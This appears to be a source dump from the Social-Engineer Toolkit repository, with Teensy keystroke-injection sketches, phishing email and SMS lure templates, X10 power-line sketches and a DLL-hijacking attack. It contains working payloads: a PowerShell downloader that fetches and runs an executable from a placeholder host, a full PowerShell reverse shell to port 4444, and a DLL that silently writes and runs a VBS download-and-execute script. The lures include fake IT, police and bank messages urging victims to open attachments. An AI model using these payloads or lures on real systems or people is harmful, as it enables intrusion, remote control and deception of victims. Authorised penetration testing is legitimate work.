{ 57 | Serial.println("error opening converts.txt"); 58 | } 59 | // ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST! 60 | delay(5000); 61 | CtrlX(); 62 | delay(5000); 63 | 64 | // Use Python to convert file back to binary. 65 | // Play with the delays to make everything work right. 
66 | Keyboard.println("python"); 67 | delay(1000); 68 | Keyboard.println("import binascii"); 69 | delay(1000); 70 | Keyboard.println("fileopen = file(\"/tmp/converts.txt\", \"rb\")"); 71 | delay(1000); 72 | Keyboard.println("data = fileopen.read()"); 73 | delay(1000); 74 | Keyboard.println("data = binascii.unhexlify(data)"); 75 | delay(1000); 76 | Keyboard.println("filewrite = file(\"/tmp/theconverted.txt\", \"w\")"); 77 | delay(1000); 78 | Keyboard.println("filewrite.write(data)"); 79 | delay(1000); 80 | Keyboard.println("quit()"); 81 | } 82 | 83 | void loop () {} 84 | 85 | void BlinkFast(int BlinkRate){ 86 | // Blinks the light...lets us know we're alive 87 | int BlinkCounter=0; 88 | for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){ 89 | digitalWrite(ledPin, HIGH); 90 | delay(80); 91 | digitalWrite(ledPin, LOW); 92 | delay(80); 93 | } 94 | } 95 | 96 | void CtrlX(){ 97 | // Save a file within Nano 98 | Keyboard.set_modifier(MODIFIERKEY_CTRL); 99 | Keyboard.set_key1(KEY_X); 100 | Keyboard.send_now(); 101 | Keyboard.set_modifier(0); 102 | Keyboard.set_key1(0); 103 | delay(100); 104 | // Press Y to Save 105 | PRES(KEY_Y); 106 | delay(100); 107 | // Press Enter to Accept the file name 108 | PRES(KEY_ENTER); 109 | } 110 | 111 | void CommandAtSpotlight(char *SomeCommand){ 112 | // Open Spotlight and find your program 113 | Keyboard.set_modifier(MODIFIERKEY_GUI); 114 | Keyboard.set_key1(KEY_SPACE); 115 | Keyboard.send_now(); 116 | Keyboard.set_modifier(0); 117 | Keyboard.set_key1(0); 118 | Keyboard.send_now(); 119 | delay(1500); 120 | Keyboard.print(SomeCommand); 121 | PRES(KEY_ENTER); 122 | } 123 | 124 | void PRES(int KeyCode){ 125 | // Press a keyboard button 126 | Keyboard.set_key1(KeyCode); 127 | Keyboard.send_now(); 128 | Keyboard.set_key1(0); 129 | Keyboard.send_now(); 130 | } 131 | -------------------------------------------------------------------------------- /src/teensy/powershell_down.pde: 
-------------------------------------------------------------------------------- 1 | // 2 | // Social-Engineer Toolkit Teensy Attack Vector 3 | // Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG) 4 | // 5 | // Special thanks to: Irongeek 6 | // 7 | // 2011-02-28 padzero@gmail.com 8 | // * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets 9 | // * Change path from C:\ to %HOMEPATH%: Fixed payload execution on Windows 7 10 | // 11 | 12 | char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://IPADDR/x.exe';$file = ' %HOMEPATH%\\x.exe ';$clnt.DownloadFile($url,$file);"; 13 | char *command2 = "%HOMEPATH%\\x.exe"; 14 | 15 | void setup() { 16 | delay(5000); 17 | omg(command1); 18 | delay(15000); 19 | // run this executable 20 | omg(command2); 21 | } 22 | 23 | void loop() {} 24 | 25 | void omg(char *SomeCommand) 26 | { 27 | Keyboard.set_modifier(128); 28 | Keyboard.set_key1(KEY_R); 29 | Keyboard.send_now(); 30 | Keyboard.set_modifier(0); 31 | Keyboard.set_key1(0); 32 | Keyboard.send_now(); 33 | delay(1500); 34 | Keyboard.println(SomeCommand); 35 | } 36 | -------------------------------------------------------------------------------- /src/teensy/powershell_reverse.pde: -------------------------------------------------------------------------------- 1 | // 2 | // Social-Engineer Toolkit Teensy Attack Vector 3 | // Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG) 4 | // 5 | // Special thanks to: Irongeek 6 | // You will need to setup a netcat listener MSF cannot handle this payload 7 | // 8 | // 2011-02-28 padzero@gmail.com 9 | // * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets 10 | // * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies 11 | // 12 | 13 | #define ascii_println Keyboard.println 14 | 15 | void setup() { 16 | delay(10000); 17 | omg("powershell"); 18 | 
delay(1000); 19 | // Here is the payload... 20 | // This is a reverse bind shell through powershell. I need to fix it use the 21 | // bind shell. The reverse bind shell code is cleaner though. 22 | // I bet we could use the dip switches to configure the IP addy or port... 23 | ascii_println("function cleanup {"); 24 | ascii_println("if ($client.Connected -eq $true) {$client.Close()}"); 25 | ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}"); 26 | ascii_println("exit}"); 27 | // Setup IPADDR HERE 28 | ascii_println("$address = 'IPADDR'"); 29 | // Setup PORT HERE 30 | ascii_println("$port = '4444'"); 31 | ascii_println("$client = New-Object system.net.sockets.tcpclient"); 32 | ascii_println("$client.connect($address,$port)"); 33 | ascii_println("$stream = $client.GetStream()"); 34 | ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize"); 35 | ascii_println("$process = New-Object System.Diagnostics.Process"); 36 | ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'"); 37 | ascii_println("$process.StartInfo.RedirectStandardInput = 1"); 38 | ascii_println("$process.StartInfo.RedirectStandardOutput = 1"); 39 | ascii_println("$process.StartInfo.UseShellExecute = 0"); 40 | ascii_println("$process.Start()"); 41 | ascii_println("$inputstream = $process.StandardInput"); 42 | ascii_println("$outputstream = $process.StandardOutput"); 43 | ascii_println("Start-Sleep 1"); 44 | ascii_println("$encoding = new-object System.Text.AsciiEncoding"); 45 | ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}"); 46 | ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)"); 47 | ascii_println("$out = $null; $done = $false; $testing = 0;"); 48 | ascii_println("while (-not $done) {"); 49 | ascii_println("if ($client.Connected -ne $true) {cleanup}"); 50 | ascii_println("$pos = 0; $i = 1"); 51 | ascii_println("while (($i -gt 0) -and ($pos -lt 
$networkbuffer.Length)) {"); 52 | ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)"); 53 | ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}"); 54 | ascii_println("if ($pos -gt 0) {"); 55 | ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)"); 56 | ascii_println("$inputstream.write($string)"); 57 | ascii_println("start-sleep 1"); 58 | ascii_println("if ($process.ExitCode -ne $null) {cleanup}"); 59 | ascii_println("else {"); 60 | ascii_println("$out = $encoding.GetString($outputstream.Read())"); 61 | ascii_println("while($outputstream.Peek() -ne -1){"); 62 | ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}"); 63 | ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)"); 64 | ascii_println("$out = $null"); 65 | ascii_println("$string = $null}} else {cleanup}}"); 66 | ascii_println(""); //Enter to start execution 67 | } 68 | 69 | void loop() { 70 | } 71 | 72 | void omg(char *SomeCommand) 73 | { 74 | Keyboard.set_modifier(128); 75 | Keyboard.set_key1(KEY_R); 76 | Keyboard.send_now(); 77 | Keyboard.set_modifier(0); 78 | Keyboard.set_key1(0); 79 | Keyboard.send_now(); 80 | delay(1500); 81 | ascii_println(SomeCommand); 82 | } 83 | -------------------------------------------------------------------------------- /src/teensy/wscript.pde: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/teensy/wscript.pde -------------------------------------------------------------------------------- /src/teensy/x10/libraries.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/teensy/x10/libraries.zip -------------------------------------------------------------------------------- /src/teensy/x10/x10_blackout.pde: -------------------------------------------------------------------------------- 1 | // Written by Rob Simon (kickenchicken57) 2 | // include the X10 library files: 3 | // Original library for sending 4 | // http://www.arduino.cc/en/Tutorial/X10 5 | 6 | // Send/Receive Library by creatrope 7 | // https://docs.google.com/leaf?id=0B5Sg6E9g_zOXMzQxZmVkYjktNjQwZi00MjgxLTk4YzQtNGIwYzI0ZjA0Njg3&hl=en_US 8 | // NOTE(review): the two #include targets below are missing from this listing (likely lost in extraction); restore them from the original file before building. 9 | #include 10 | #include 11 | 12 | #define zcPin 12 // the zero crossing detect pin 13 | #define dataPin 13 // the X10 data out pin 14 | #define repeatTimes 1 15 | 16 | // set up a new x10 library instance: 17 | x10 myHouse = x10(zcPin, dataPin); 18 | 19 | void setup() { 20 | } 21 | // loop() runs repeatedly, so the ALL_UNITS_OFF command is written again on every pass (repeatTimes = 1 per call). A is presumably the X10 house code; confirm against the library constants. 22 | void loop() { 23 | myHouse.write(A, ALL_UNITS_OFF,repeatTimes); 24 | } 25 | -------------------------------------------------------------------------------- /src/teensy/x10/x10_sniffer.pde: -------------------------------------------------------------------------------- 1 | /* Arduino Interface to the PSC05 X10 Receiver. 
BroHogan 3/24/09 2 | * SETUP: X10 PSC05/TW523 RJ11 to Arduino (timing for 60Hz) 3 | * - RJ11 pin 1 (BLK) -> Pin 2 (Interrupt 0) = Zero Crossing 4 | * - RJ11 pin 2 (RED) -> GND 5 | * - RJ11 pin 3 (GRN) -> Pin 4 = Arduino receive 6 | * - RJ11 pin 4 (YEL) -> Pin 5 = Arduino transmit (via X10 Lib) 7 | * NOTES: 8 | * - Must detach interrupt when transmitting with X10 Lib 9 | * Written by: Rob Simon (kickenchicken57) 10 | * Original library for sending 11 | * http://www.arduino.cc/en/Tutorial/X10 12 | * Send/Receive Library by creatrope 13 | * https://docs.google.com/leaf?id=0B5Sg6E9g_zOXMzQxZmVkYjktNjQwZi00MjgxLTk4YzQtNGIwYzI0ZjA0Njg3&hl=en_US 14 | */ 15 | 16 | #include "WProgram.h" // this is needed to compile with Rel. 0013 17 | #include // X10 lib is used for transmitting X10 (header name missing from this listing) 18 | #include // X10 Lib constants (header name missing from this listing) 19 | #define RPT_SEND 2 20 | 21 | #define ZCROSS_PIN 2 // BLK pin 1 of PSC05 22 | #define RCVE_PIN 4 // GRN pin 3 of PSC05 23 | #define TRANS_PIN 5 // YEL pin 4 of PSC05 24 | #define LED_PIN 13 // for testing 25 | 26 | x10 SX10= x10(ZCROSS_PIN,TRANS_PIN,RCVE_PIN,LED_PIN);// set up an x10 library instance 27 | 28 | void setup() { 29 | Serial.begin(9600); 30 | } 31 | 32 | // Polls the X10 receiver: when a command has been received, prints it via debug() and then calls reset(). 33 | // NOTE(review): this loop only receives; it never transmits and does not drive D5. 34 | void loop() 35 | { 36 | if (SX10.received()) 37 | { // received a new command 38 | SX10.debug(); // print out the received command 39 | SX10.reset(); 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/templates/31328256862518006364.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy (ReL1K) 2 | # 3 | # 4 | # 5 | SUBJECT="WOAAAA!!!!!!!!!! This is crazy..." 6 | 7 | BODY="You have to see the attached file... 
I can't believe it...\n" 8 | -------------------------------------------------------------------------------- /src/templates/4842870413984355770.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy (ReL1K) 2 | # 3 | # 4 | # 5 | SUBJECT="How long has it been?" 6 | 7 | BODY="How long has it been since you saw this? Attached...\n" 8 | -------------------------------------------------------------------------------- /src/templates/84863010888203269076.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy (ReL1K) 2 | # 3 | # 4 | # 5 | SUBJECT="Have you seen this?" 6 | 7 | BODY="Hey.. Not sure if you saw this but I wasn't aware of it...\n" 8 | -------------------------------------------------------------------------------- /src/templates/baby.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # Baby pics author 4 | # 5 | SUBJECT="Baby Pics" 6 | 7 | BODY="Baby pics of little Sabitha at 6 months, shes so cute.." 8 | -------------------------------------------------------------------------------- /src/templates/ebook.template: -------------------------------------------------------------------------------- 1 | # Author: The_UnKn@wn 2 | # 3 | # 4 | # 5 | SUBJECT="Dan Brown's Angels & Demons" 6 | 7 | BODY="Hey\n\nI found a pdf version of Dan Brown's book "Angels & Demons" on the internet.\nI already read the book and it is great. 
You will enjoy reading it at least once.\n\nHave fun reading it and write me back how you liked it.\n\nBye\n" 8 | -------------------------------------------------------------------------------- /src/templates/newupdate.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # 4 | # 5 | SUBJECT="New Update" 6 | 7 | BODY="There was a new update to the overall document that I need you to review. You'll notice the changes on page 2 and 3. \n\nThanks for the help!\n\nJames\n" 8 | -------------------------------------------------------------------------------- /src/templates/receipt.template: -------------------------------------------------------------------------------- 1 | # Author: Ruben Alejandro (chap0) 2 | # 3 | # 4 | # 5 | SUBJECT="Order Confirmation" 6 | 7 | BODY="Hello,\nAttached you will find your receipt for the order that you placed. Please be aware that it may take 2-3 business days for items to be shipped.\nIt has been a pleasure to have your business.\n\nThank you\n Jim Woznaky\n" 8 | 9 | -------------------------------------------------------------------------------- /src/templates/report.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # Status Computer Issue 4 | # 5 | SUBJECT="Computer Issue" 6 | 7 | BODY="Greetings,\n\nI have been recently experiencing issues with my computer and have been unable to run this report, I believe that the file may be messed up however, I cannot confirm this. Can someone please take a look and identify if it is my machine or just this file? 
I have an immediate deadline to produce this report, any help would be greatly appreciated.\n\nSincerely,\n\nJeff" 8 | -------------------------------------------------------------------------------- /src/templates/sms/12161896267335046246.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="221251" 6 | 7 | SUBJECT="Movistar: publicidad nieve" 8 | 9 | BODY="MS Publi:Entra en www.apuntatealanieve.es y participa en el sorteo de 50 packs de 2 forfaits para 2 dias en cualquier estacion de Aramon. Valido hasta el 2/03" 10 | -------------------------------------------------------------------------------- /src/templates/sms/16596172621284277248.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="609" 6 | 7 | SUBJECT="Movistar: publicidad verano internet" 8 | 9 | BODY="Movistar publi: Este verano sigue en Internet con el Kit INTERNET MOVIL PREPAGO.Si lo usas pagas,si no lo usas no pagas.Consiguelo en tu distribuidor movistar" 10 | -------------------------------------------------------------------------------- /src/templates/sms/18563883160952176830.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="teabla" 6 | 7 | SUBJECT="teabla: moviles gratis" 8 | 9 | BODY="Rebajas exclusivas para ti en teabla: Llevate el Nokia 2680 por 13000 puntos y 0 euros.Solo hasta 15/02/10. Registrate en www.teabla.es 902203050" 10 | -------------------------------------------------------------------------------- /src/templates/sms/27973430829013746123.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="7412" 6 | 7 | SUBJECT="TMB: temps espera" 8 | 9 | BODY="0488-Av de Madrid-Vallespir Linia Temps *54 5 min* Temps aproximat. 
TMB Gràcies" 10 | -------------------------------------------------------------------------------- /src/templates/sms/34070789312210934380.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="221251" 6 | 7 | SUBJECT="Movistar: publicidad ROCKRIO" 8 | 9 | BODY="Movistar Publi:Vive ROCK&RIO al maximo con Movistar.Si eres de Telefonica o Movistar consigue tus entradas en movistar.es/rockinrio.SORTEAMOS 1.000. Hsta 19/04" 10 | -------------------------------------------------------------------------------- /src/templates/sms/43234513006619301607.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="2255" 6 | 7 | SUBJECT="Movistar: publicidad tarifa llamada" 8 | 9 | BODY="Movistar info: Recuerda q la Tarifa Diaria q ya disfrutas te permite llamar en Europa por slo 0,28e/min+0,57 (estb llam)+1,16e cada dia q la utilices.+inf 609" 10 | -------------------------------------------------------------------------------- /src/templates/sms/45723463533772650533.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="Movistar" 6 | 7 | SUBJECT="Movistar: oferta otoño" 8 | 9 | BODY="Publi:Hable en otoño 100 min y pague solo 1 hasta 9 nov cualquier destino nac(no incl establ)Alta 3,45e(iva incl)Y por 1,18 (iva incl)SMS al 50%.Alta en el 1200" 10 | -------------------------------------------------------------------------------- /src/templates/sms/48842587427349852379.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="474" 6 | 7 | SUBJECT="Yavoy: regalo yavoy" 8 | 9 | BODY="Publi:GRATIS tu primer Yavoy! 
Llama al 474, elige Yavoy preferido y nosotros te lo regalamos!D.Bisbal,Guetta,Baute,5a estacion...p.llam:0.15+0.30e/min" 10 | -------------------------------------------------------------------------------- /src/templates/sms/51366883259558865424.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="221252" 6 | 7 | SUBJECT="Movistar: publicidad aramon" 8 | 9 | BODY="movistar publi:Envia ARAMON al 7213 y consigue tu forfait ARAMONCLUB MOVISTAR con ventajas exclusivas y descuento hasta 20%.+info aramon.es" 10 | -------------------------------------------------------------------------------- /src/templates/sms/5366255995038334754.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="7770" 6 | 7 | SUBJECT="Tu Banco: visa disponible en oficina" 8 | 9 | BODY="TARGETA VISA JA DISPONIBLE A OFICINA DE RIERA BLANCA/TU BANCO.0000 LA RIERA BLANCA" 10 | -------------------------------------------------------------------------------- /src/templates/sms/61235614880419094815.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="M.vivienda" 6 | 7 | SUBJECT="Ministerio vivienda: incidencia pago" 8 | 9 | BODY="Ministerio de Vivienda. Tienes una incidencia en el pago de tu RBE. Motivo NO EXISTE VERIFICACION PAGO DEL ALQUILER info en www.alquilerjoven.es" 10 | -------------------------------------------------------------------------------- /src/templates/sms/65225885161440001690.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="609" 6 | 7 | SUBJECT="Movistar: publicidad navidad" 8 | 9 | BODY="Movistar Info:Cada año, las personas para las que eres importante te felicitan la Navidad.En movistar nos sumamos a ellas deseandote Feliz Navidad y Feliz 2010." 
10 | -------------------------------------------------------------------------------- /src/templates/sms/71056159094763737298.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="86323663" 6 | 7 | SUBJECT="Vodafone: publicidad nuevo contrato" 8 | 9 | BODY="VF Info: El 1 de diciembre 2010 entra en vigor la nueva clausula 11 de las condiciones generales del contrato. Para informarte y oposicion consulta www.vodafone.es." 10 | -------------------------------------------------------------------------------- /src/templates/sms/81470651031833477694.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="609" 6 | 7 | SUBJECT="Movistar: publicidad nokia gratis" 8 | 9 | BODY="Movistar publi:por ser cliente Movistar tiene a 0 Euros un Nokia X6 con alta Tarifa Plana Internet movil Premium.Ms info en 609.Max 30.000 canjes hasta 31/3." 10 | -------------------------------------------------------------------------------- /src/templates/sms/89232956998478665492.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="2255" 6 | 7 | SUBJECT="Movistar: publicidad tarifa sms" 8 | 9 | BODY="Movistar publi: Con la Tarifa Diaria Europa los sms en Europa a 0,10e/sms y ahora las llamadas recibidas a 0e/min hasta el 12/4. ALTA Gratis llamando al 2255" 10 | -------------------------------------------------------------------------------- /src/templates/sms/93752647864031571599.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="5039" 6 | 7 | SUBJECT="MRW: pedido no entregado" 8 | 9 | BODY="MRW INFORMA: SU ENVIO 01111/1111100 NO HA PODIDO SER ENTREGADO POR AUSENCIA DEL DESTINATARIO. ROGAMOS CONTACTE CON SU FRANQUICIA MRW EN EL TLF. 
933255454" 10 | -------------------------------------------------------------------------------- /src/templates/sms/98099561929676707961.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="762" 6 | 7 | SUBJECT="ruralvia: confirmacion de transferencia" 8 | 9 | BODY="El Sr/Sra DAVID FERNANDEZ VAZQUEZ le comunica que ha realizado una transferencia desde ruralvia a su favor por importe de 500,20 Euro" 10 | -------------------------------------------------------------------------------- /src/templates/sms/fake_boss.template: -------------------------------------------------------------------------------- 1 | # Author: smsgang.com 2 | # 3 | # 4 | ORIGIN="8888" 5 | SUBJECT="Boss Fake" 6 | BODY="Hi Michael, please come to office earlier tomorrow.\n\nI will wait you at 7 there" 7 | -------------------------------------------------------------------------------- /src/templates/sms/fake_police.template: -------------------------------------------------------------------------------- 1 | # Author: smsgang.com 2 | # 3 | # 4 | ORIGIN="8888" 5 | SUBJECT="Police Fake" 6 | BODY="Dear Mr.Jackson, You are invited to nearest police station for questioning.\n\nPolice Department." 7 | -------------------------------------------------------------------------------- /src/templates/sms/fool_vodafone.template: -------------------------------------------------------------------------------- 1 | # Author: smsgang.com 2 | # 3 | # 4 | ORIGIN="8888" 5 | SUBJECT="Vodafone Fool" 6 | BODY="You have been charged 73 pounds for reading this SMS.\n\nThanks for using Vodafone." 
7 | -------------------------------------------------------------------------------- /src/templates/status.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # 4 | # Latest Report Template 5 | # 6 | SUBJECT="Status Report" 7 | 8 | BODY="Greetings,\n\nPlease view the latest status report.\n\nThanks,\n\nRich" 9 | -------------------------------------------------------------------------------- /src/templates/strange.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # Strange internet usage from your computer 4 | # 5 | 6 | SUBJECT="Strange internet usage from your computer" 7 | 8 | BODY="Greetings,\n\nWe have been noticing strange internet traffic originating from your computer. It appears there has been a small outbreak of viruses that may have spread across the network. We are attempting to remove these infections however need you to run the attached file in order to "clean" the system. 
Your help in this manner is greatly appreciated.\n\nWarm regards,\n\nThe Systems Administration Team" 9 | -------------------------------------------------------------------------------- /src/webattack/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/__init__.py -------------------------------------------------------------------------------- /src/webattack/browser_exploits/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/browser_exploits/__init__.py -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/dll_hijacking/__init__.py -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/hijacking.c.wscript: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | DLL Hijacker Attack Written by Dave Kennedy (ReL1K) for the 4 | Social-Engineer Toolkit (SET) spear-phishing attack vector. 5 | 6 | This is an ugly cscript downloader, it works on all platforms but 7 | will rewrite in C later instead of cscript. 
8 | 9 | strFileURL = "http://IPADDRHERE/x" 10 | strHDLocation = "C:\x.exe" 11 | Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") 12 | objXMLHTTP.open "GET", strFileURL, false 13 | objXMLHTTP.send() 14 | If objXMLHTTP.Status = 200 Then 15 | Set objADOStream = CreateObject("ADODB.Stream") 16 | objADOStream.Open 17 | objADOStream.Type = 1 18 | objADOStream.Write 19 | objXMLHTTP.ResponseBody 20 | objADOStream.Position = 0 21 | Set objFSO = Createobject("Scripting.FileSystemObject") 22 | If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation 23 | Set objFSO = Nothing 24 | objADOStream.SaveToFile strHDLocation 25 | objADOStream.Close 26 | Set objADOStream = Nothing 27 | End if 28 | Set objXMLHTTP = Nothing 29 | Set WshShell = WScript.CreateObject("WScript.Shell") 30 | WshShell.Run "c:\x.exe" 31 | 32 | */ 33 | 34 | #include 35 | #include 36 | #include 37 | 38 | 39 | 40 | int run() 41 | { 42 | 43 | FILE *file; 44 | char* command = "cmd /c cscript c:\\x.vbs"; // execute the vbs script after fopen write 45 | char* host = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // in SET does a replace of the length of IP address then terminates with a null byte to remove the rest of the X's 46 | file = fopen("C:\\x.vbs", "w"); // write file x.vbs 47 | fprintf(file,"strFileURL = \"http://%s/x\"\nstrHDLocation = \"C:\\x.exe\"\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nobjXMLHTTP.open \"GET\", strFileURL, false\nobjXMLHTTP.send()\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject(\"ADODB.Stream\")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject(\"Scripting.FileSystemObject\")\nIf objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile strHDLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\nWshShell.Run 
\"c:\\x.exe\"", host); // write the downloader file, this will grab an executable 48 | fclose(file); // close the file 49 | 50 | STARTUPINFO si; 51 | PROCESS_INFORMATION pi; 52 | 53 | ZeroMemory( &si, sizeof(si) ); 54 | si.cb = sizeof(si); 55 | ZeroMemory( &pi, sizeof(pi) ); 56 | si.dwFlags = STARTF_USESHOWWINDOW; 57 | si.wShowWindow = SW_HIDE; // hide the window 58 | 59 | // Start the child process. 60 | if( !CreateProcess( NULL, // No module name (use command line) 61 | command, // Command line 62 | NULL, // Process handle not inheritable 63 | NULL, // Thread handle not inheritable 64 | FALSE, // Set handle inheritance to FALSE 65 | 0, // No creation flags 66 | NULL, // Use parent's environment block 67 | NULL, // Use parent's starting directory 68 | &si, // Pointer to STARTUPINFO structure 69 | &pi ) // Pointer to PROCESS_INFORMATION structure 70 | ) 71 | 72 | // Wait until child process exits. 73 | WaitForSingleObject( pi.hProcess, INFINITE ); 74 | 75 | // Close process and thread handles. 
76 | CloseHandle( pi.hProcess ); 77 | CloseHandle( pi.hThread ); 78 | sleep(5); 79 | 80 | exit(0); 81 | return 0; 82 | } 83 | // DllMain: library entry point; calls run() and returns 0. run() above writes C:\x.vbs, starts "cmd /c cscript c:\x.vbs" with a hidden window and ends in exit(0). Defender note: the observable pattern is the host application writing C:\x.vbs and spawning cscript on it, after which the script saves and runs C:\x.exe. 84 | BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) 85 | { 86 | run(); 87 | return 0; 88 | } 89 | 90 | -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/hijacking.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/dll_hijacking/hijacking.dll -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/hijacking.dll.wscript: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/dll_hijacking/hijacking.dll.wscript -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/repository: -------------------------------------------------------------------------------- 1 | Windows Address Book (Universal),wab,wab32res.dll 2 | Microsoft Help and Support Center,hlp,wshfra.dll 3 | wscript.exe (XP),wscript,wshfra.dll 4 | Microsoft Office PowerPoint 2007,pptx,rpawinet.dll 5 | Microsoft Group Converter,grp,imm.dll 6 | Safari v5.0.1,html,dwmapi.dll 7 | Firefox <= 3.6.8,html,dwmapi.dll 8 | Microsoft PowerPoint 2010,pptx,pptimpconv.dll 9 | Microsoft PowerPoint 2007,pptx,pp4x322.dll 10 | Microsoft Visio 2010,vsd,dwmapi.dll 11 | Microsoft Word 2007,docx,schannel.dll 12 | Microsoft Powerpoint 2007,pptx,schannel.dll 13 | Microsoft Windows Media Encoder 9,prx,msxml.dll 14 | Windows 7 and Vista Backup Utility,wbcat,fveapi.dll 15 | EnCase,endump,rsaenh.dll 16 | IBM Rational 
